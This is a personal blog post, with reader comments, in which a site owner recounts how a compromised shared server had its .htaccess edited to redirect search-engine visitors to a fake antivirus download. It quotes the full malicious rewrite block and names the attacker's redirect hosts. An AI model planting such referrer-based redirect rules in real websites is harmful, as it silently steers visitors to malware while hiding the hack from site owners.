Internet
How to
Newspapers
Twitter
SEO advice
Categories: How to, Internet, Malcolm Coles.

Website no longer hacked. Phew.

December 24, 2009 6 Comments

So I discovered today that my blog had been hacked - a word that governs a multitude of sins.

This hack seemed very clever:

  • If you typed a URL in directly, as I would to get to my own site, the site worked as normal.
  • If you visited the site from Google (or another search engine), you got redirected to another site, below, that tried to persuade you to download some supposed anti-virus software (which I'm sure was no such thing). I had no idea this was going on, as everything looked fine to me.

Not my site ...

Not my site ...

It turns out that someone had edited the htaccess file (a sort of configuration file for directories on your server) and made it look like this:

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR]

RewriteCond %{HTTP_REFERER} .*ask.* [OR]

RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]

RewriteCond %{HTTP_REFERER} .*excite.* [OR]

RewriteCond %{HTTP_REFERER} .*altavista.* [OR]

RewriteCond %{HTTP_REFERER} .*msn.* [OR]

RewriteCond %{HTTP_REFERER} .*netscape.* [OR]

RewriteCond %{HTTP_REFERER} .*aol.* [OR]

RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]

RewriteCond %{HTTP_REFERER} .*goto.* [OR]

RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]

RewriteCond %{HTTP_REFERER} .*mamma.* [OR]

RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]

RewriteCond %{HTTP_REFERER} .*lycos.* [OR]

RewriteCond %{HTTP_REFERER} .*search.* [OR]

RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]

RewriteCond %{HTTP_REFERER} .*bing.* [OR]

RewriteCond %{HTTP_REFERER} .*dogpile.*

RewriteRule .* http://justrags.com/Swatches/1106/jpg.php [R,L]

So whenever anyone visited my site from one of those search engines, the server automatically redirected it to the justrags.com site - which has a file on it called jpg.php it (not an image, but a file made to look like one to fool the site owner).

This, in turn, redirects you to thebestantispywarei.com (don't go there). That site tries to get you to install some alleged anti-virus software, which you definitely shouldn't.

It then turned out that my not-yet-finished company site had the same issue.

At first I thought that someone must have managed to get hold of all my passwords (the login details for the two sites are different - so one login can't access both).

But then I checked out some other sites on my shared server such as:

  • www.christchurchsouthcambs.org,
  • gingerbeer.co.uk,
  • possoft.co.uk and
  • bloomsburycleaning.co.uk.

They all had (have as I write this) the same issue - visits via google were redirected, but you could get to the site by typing the URL directly.

My webhost hasn't given me a very good explanation of what has happened or what's going to stop it happening again - clearly the whole server has been compromised.

But, for now, I've recreated a normal htaccess file for a wordpress blog - cobbling one together out of this and this. And the site is back working as normal - with new passwords for the server.

You might also like
  1. Jan Moir and the PCC: why its website crashed
  2. Immigration Advisory Service hacked
  3. Cash Gordon: Do people REALLY not know the dangers of unfiltered twitter streams?
  4. Open Graph: let people FaceBook “like” your WordPress (or other) website
  5. ABCe: please sort out your terrible website (again)

Share this post

Follow me on Facebook or Twitter

6 Comments »

  • Michael McGrath ( Ireland) says:

    Job Change : Welfare Tourist in Ireland !

    Glad you're back to normal - I was hacked so often that I went back to university , Trinity College Dublin, to a Computer Science degree there, mostly to learn how to keep my computer secure ! I can afford to as I changed years ago from Press Photographer to running my own studio.

    An idea I have is that maybe unemployed journalists could switch to freelance press photography for a living - you don't need to be a David Bailey to do press photography for a newspaper as it's the story your pictures tell, or how well they amplify a hot news item, rather than technical expertise , that counts , and a basic digital SLR from the Canon range can be used like a point-and-shoot for press work quite easily .

    They could accompany their freelance photo offerings with write-ups for publication - a much easier package to sell !

    Or even film those special articles they always planned to write with a HD camcorder as a television documentary !

    Another idea I have for an unemployed journalist is to team up with a cartoonist and work out the humourous satirical captions - there is always a massive demand for ingenious cartoons for publication .

    Or , failing everthing, they could come and relax on the dole in Ireland while they write that novel -

    The Irish Dole is now three times as much as the dole in the U.K., with top rent allowances as well, so much so that word has travelled as far as the foothills of the Urals and we are witnessing a new phenomenon arriving on our shores from all over Europe this past few years, wittily dubbed " The Welfare Tourist " . They're having a ball :-)

    Personally I think that the journalist unions, especially the NUJ, should with government support, run Job Help days for unemployed journalists at centres all over the country .

    Yes, you've guessed, I was through the mill in a former incarnation and worked my way out of it all . Anything I can do, any fool can do better :-)

    Michael .

    • Michael McGrath says:

      Tons of Work out there for Unemployed Press Photographers , but you have to be really good, the Best :-)

      And for this job change you need to be one heck of a salesperson - Confirmation Photographer !

      ( This is how I earned the money to set up my own studio, took a few years ! )

      Basically , it consists of travelling around to all the Confirmation ceremonies of the Catholic Church and photographing the families and children with the bishop on the spot in the churchyard after Confirmations - get there beforehand as all the people enter the churchyard to take your bookings. Your rates have to be reasonable, say, two 10 x 8 colour enlargements for fifty quid ( sitting charge in studio for this can be as much as £300 , so you're doing the people a great favour ! ( We don't have the bishop as a prop in studio !!! )

      Get the Lists of Confiirmations now from the Diocesan Office,, they start around the end of January and go right up to June, almost every day of the week, you can have as many as 400 families involved per Confirmation, so you have to be fast on the trigger with those who book you, really you have to be able to " machine-gun" with a medium format camera, preferably a film camera as it's outdoor portraiture, scan them to digital afterwards , and, Wow, the results are stunning, have you ever scanned your medium format negs , it's fabbulous ! ( this business is not for amateurs !!! ).

      Get receipt books printed, have a couple of 10 x 8 samples with you - and take full payment on the spot, but make those photos GOOD and you're really welcome back year in, year out, as you become known to be the Best :-)

      AND before you start the Confirmation Season, also contact the local newspaper editors in the area and you'll find that they'll be delighted to take the best Confo shots you send them - with byline that makes you well-known and trusted in every diocese you work as well :-)

      And you'll make a lot more money , in cash, on the spot than you'll ever earn as a freelance from any newspaper - sometimes you can plan it to cover two, even three, adjoining Confirmation ceremonies a day .

      ( Bring along the b/f or g/f to take the money, give change, write out receipts - and take the names and addresses of all your customers for postage of photographss to them, this can be a great way yoo to drum up future business, especially weddings, with all the families you do business with )

      Happy Xmas All !

      Michael .

  • Ian Miller says:

    Good to see you're back up and running :)

    So if you're hosts aren't recognising they have a problem, are you going to stay with them?

  • Dave says:

    Glad you're back up and running - scary to think they were able to access the whole server though...

  • George says:

    Good to have you back in the safe world Malcolm! It's always scary when your blog is hacked.

    I've had a good experience with
    http://www.webfaction.co.uk even in the UK a their support is excellent plus they allow a huge amount of configuration over the server.

    Merry Christmas!

  • Ben says:

    My website got hacked by the same thing too. I got this back from my hosting company.

    This was an exploit on our server however we did actually think we removed it all :(

    The exploit came about as a tech was updating our IP Tables and CSF / BFD Firewalls and the security had to be shutdown for 5 minutes.

    This was a few weeks back and we have since found a way to carry out maintenance without putting the server at jeopardy again.

    Im sorry for the inconvenience caused.

    If there is anything else i can help with please do not hesitate to contact me.

Leave a comment!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.

You can use these tags:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

This is a Gravatar-enabled weblog. To get your own globally-recognized-avatar, please register at Gravatar.